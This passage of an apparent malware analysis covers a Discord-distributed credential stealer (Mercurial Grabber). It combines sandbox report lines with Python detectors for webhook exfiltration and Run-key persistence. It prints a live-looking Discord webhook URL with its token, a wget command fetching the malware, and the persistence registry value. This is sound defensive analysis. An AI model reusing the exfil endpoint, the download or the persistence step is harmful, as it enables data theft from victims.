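    "GET //json/84.17.52.68 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive",
    "POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | "
    "Content-Type: application/json | Host: discord.com | Content-Length: 448 | "
    "Expect: 100-continue | Connection: Keep-Alive",
]

# Discord webhook paths: /api/webhooks/<numeric id>/<token>, optionally with /api/vN/.
WEBHOOK_RE = re.compile(r"^/api/(?:v\d+/)?webhooks/(?P<id>\d+)/(?P<token>[A-Za-z0-9_-]{20,})")
# Example's own, deliberately short lists (assumption: extend from your own telemetry).
DISCORD_HOSTS = {"discord.com", "discordapp.com"}
IP_LOOKUP_HOSTS = {"ip4.seeip.org", "ip-api.com"}

Finding = Tuple[str, str, str]  # (severity, rule, detail)


def parse_request(record: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a one-line record into (method, path, lowercase-header dict)."""
    parts = [p.strip() for p in record.split(" | ")]
    method, path, _version = parts[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for header in parts[1:]:
        name, _, value = header.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def triage_request(record: str) -> List[Finding]:
    """Return the findings for one request; an empty list means nothing matched."""
    method, path, headers = parse_request(record)
    host = headers.get("host", "")
    findings: List[Finding] = []

    # Stolen data leaves the host as a POST to a Discord webhook. Only the first
    # characters of the token are reported so the finding itself is safe to log.
    match = WEBHOOK_RE.match(path)
    if method == "POST" and host in DISCORD_HOSTS and match:
        findings.append(("high", "discord_webhook_exfil",
                         f"webhook_id={match['id']} token={match['token'][:6]}..."))

    # Public-IP lookups precede the exfil: the stealer geolocates the victim.
    if host in IP_LOOKUP_HOSTS:
        findings.append(("medium", "public_ip_lookup", host))

    # Hand-rolled HTTP clients in .NET stealers frequently send no User-Agent.
    if "user-agent" not in headers:
        findings.append(("low", "no_user_agent", f"{method} {host}{path}"))

    return findings


def triage_all(records: List[str]) -> List[Finding]:
    """Flatten the findings over a list of records."""
    return [finding for record in records for finding in triage_request(record)]


if __name__ == "__main__":
    for severity, rule, detail in triage_all(SAMPLE_REQUESTS):
        print(f"[{severity:6}] {rule:22} {detail}")
```

The wget download of the sample itself produces no finding: it carries a User-Agent and talks to cdn.discordapp.com, which is also where legitimate attachments live. The webhook POST is the high-confidence event; the IP lookups and missing User-Agent on their own are only corroboration.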

                        E-Banking Fraud:

Yara detected MercurialGrabber
Source: Yara match | File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

                        System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED | Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED | Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED | Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED | Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BB61F6
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBBD99
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BB6FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC08936FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC0893BD99
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC089361F6
Source: NitroGenV0.5.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NitroGenV0.5.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
Source: unknown | Process created: C:\Users\user\Desktop\download\NitroGenV0.5.exe "C:\Users\user\Desktop\download\NitroGenV0.5.exe"
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File created: C:\Users\user\AppData\Local\Temp\cookies.db
Source: classification engine | Classification label: mal100.troj.spyw.evad.win@8/11@7/5
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_01
Source: C:\Windows\SysWOW64\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected

                        Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Source: C:\Windows\SysWOW64\wget.exe | Code function: 4_2_009F29B6 pushfd ; ret 4_2_009F2CF2
Source: C:\Windows\SysWOW64\wget.exe | Code function: 4_2_009EC354 push eax; ret 4_2_009EC355
Source: C:\Windows\SysWOW64\wget.exe | Code function: 4_2_009EC350 push eax; ret 4_2_009EC351
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC08930443 pushad ; ret 17_2_00007FFC08930451
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe
Source: C:\Windows\SysWOW64\wget.exe | File created: C:\Users\user\Desktop\download\NitroGenV0.5.exe
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial Grabber
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial Grabber
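The last lines above are the persistence step: the copy run from the Desktop first drops a second copy into AppData\Local\Temp (the "File created" entry), then registers a value named "Mercurial Grabber" under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The pattern worth alerting on is a Run value written by a process that itself lives in a user-writable directory and that points at another user-writable path. The Python below is an added example, not part of the Joe Sandbox report or of the Mercurial Grabber code, that scores Sysmon Event ID 13 (RegistryEvent, value set) records for that pattern. The three events are constructed: the SID is made up, and the assumption that the value data is the path of the Temp copy is the example's own, since the report shows the value name but not its data.

```python
import re
from typing import Dict, List, Optional

# Value-set events under a Run or RunOnce key; the final path component is the value name.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(?:Run|RunOnce)\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)
# Directories a standard user can write to without elevation (example's own list).
USER_WRITABLE_RE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(?:AppData\\Local\\Temp|AppData\\Roaming|Desktop|Downloads)\\",
    re.IGNORECASE,
)

# Constructed Sysmon Event ID 13 records. The first mirrors the behaviour in the
# report (Desktop copy registers the Temp copy; the value data is an assumption).
# The second is a benign vendor updater, the third a non-Run registry write.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {
        "EventID": 13,
        "Image": r"C:\Users\user\Desktop\download\NitroGenV0.5.exe",
        "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                        r"\Software\Microsoft\Windows\CurrentVersion\Run\Mercurial Grabber",
        "Details": r"C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe",
    },
    {
        "EventID": 13,
        "Image": r"C:\Program Files\Vendor\Updater.exe",
        "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                        r"\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
        "Details": r'"C:\Program Files\Vendor\Updater.exe" --tray',
    },
    {
        "EventID": 13,
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                        r"\Software\Microsoft\Windows\Shell\BagMRU\0",
        "Details": "Binary Data",
    },
]


def first_exe_path(details: str) -> str:
    """Extract the executable path from Run value data (quoted or first token)."""
    match = re.match(r'^"([^"]+)"|^(\S+)', details)
    if not match:
        return ""
    return match.group(1) or match.group(2)


def assess_run_key_event(event: Dict[str, object]) -> Optional[Dict[str, object]]:
    """Score one Sysmon value-set event; None if it is not a Run/RunOnce write."""
    if event.get("EventID") != 13:
        return None
    key_match = RUN_KEY_RE.search(str(event.get("TargetObject", "")))
    if not key_match:
        return None
    registered = first_exe_path(str(event.get("Details", "")))
    writer = str(event.get("Image", ""))
    reasons: List[str] = []
    if USER_WRITABLE_RE.match(registered):
        reasons.append("run_value_points_to_user_writable_path")
    if USER_WRITABLE_RE.match(writer):
        reasons.append("writer_runs_from_user_writable_path")
    # A process registering a binary other than itself is the drop-then-persist shape.
    if registered and writer and registered.lower() != writer.lower():
        reasons.append("writer_differs_from_registered_binary")
    return {
        "value_name": key_match["value"],
        "registered": registered,
        "writer": writer,
        "score": len(reasons),
        "reasons": reasons,
    }


def suspicious_run_keys(events: List[Dict[str, object]], threshold: int = 2) -> List[Dict[str, object]]:
    """Return the assessments at or above the threshold score."""
    assessed = (assess_run_key_event(e) for e in events)
    return [a for a in assessed if a is not None and a["score"] >= threshold]


if __name__ == "__main__":
    for hit in suspicious_run_keys(SAMPLE_EVENTS):
        print(f"score={hit['score']} value={hit['value_name']!r} "
              f"writer={hit['writer']} registered={hit['registered']} reasons={hit['reasons']}")
```

The threshold of 2 is deliberate: plenty of legitimate software writes its own path into Run, and a single reason is common in Electron and per-user installers under AppData\Roaming. The combination of a user-writable writer registering a different user-writable binary is what matches this sample. On a live host the same scoring can be applied to the current Run key contents by reading the values and treating the file owner or creator as the writer; the example keeps to offline Sysmon records so it runs anywhere.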